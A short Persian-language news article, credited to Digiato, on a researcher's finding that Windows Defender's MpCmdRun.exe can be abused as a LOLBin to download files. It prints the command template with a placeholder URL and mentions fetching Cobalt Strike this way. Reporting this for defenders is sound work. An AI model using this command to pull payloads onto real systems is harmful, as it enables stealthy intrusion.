دانلود بدافزار توسط آنتی ویروس ویندوز 10: یک محقق امنیتی به نام Mohammad Askar می‌گوید تغییرات در ابزار Command Line مایکروسافت دیفندر به هکرها اجازه می‌دهد تا از این آنتی ویروس به عنوان LOLBin استفاده کنند. به آن دسته از فایل‌های معتبر سیستم عامل که می‌توان از آنها برای اهداف خرابکارانه استفاده کرد، LOLBin گفته می‌شود. LOLBINها در ویندوز ۱۰ وجود داشته و هر کدام از آنها عملکرد غیرخرابکارانه دارند، اما هکرها با دسترسی غیرمجاز می‌توانند از این فایل‌ها برای دور زدن سپرهای امنیتی و حمله به کامپیوتر بدون اطلاع کاربر استفاده کنند.

آنتی ویروس ویندوز 10

آنطور که Askar می‌گوید، ابزار Command Line مایکروسافت دیفندر حالا از دستور جدیدی به نام DownloadFile- پشتیبانی می‌کند. این تغییر احتمالاً در نسخه 4.18.2007.9 یا 4.18.2009.9 این نرم افزار رخ داده است. هکرها با نفوذ به شبکه محلی می‌توانند با استفاده از ابزار Microsoft Anti malware Service Command Line Utility و دستور زیر فایل مخرب را دانلود کنند:

<MpCmdRun.exe -DownloadFile -url <url> -path <local-path

محقق امنیتی یاد شده با استفاده از این تکنیک بدافزاری به نام Cobalt Strike را مستقیماً بوسیله مایکروسافت دیفندر دانلود کرد. دیفندر قادر به شناسایی و حذف فایل‌های مخرب دانلود شده با استفاده از این روش است، اما مشخص نیست دیگر نرم افزارهای آنتی ویروس نیز قادر به دفاع از سیستم در برابر فایل‌های مخرب دانلود شده از این روش هستند یا خیر. به متخصصین شبکه توصیه می‌شود تا این LOLBin را در لیست خود قرار دهند تا از حمله احتمالی جلوگیری شود.

منبع خبر: دیجیاتو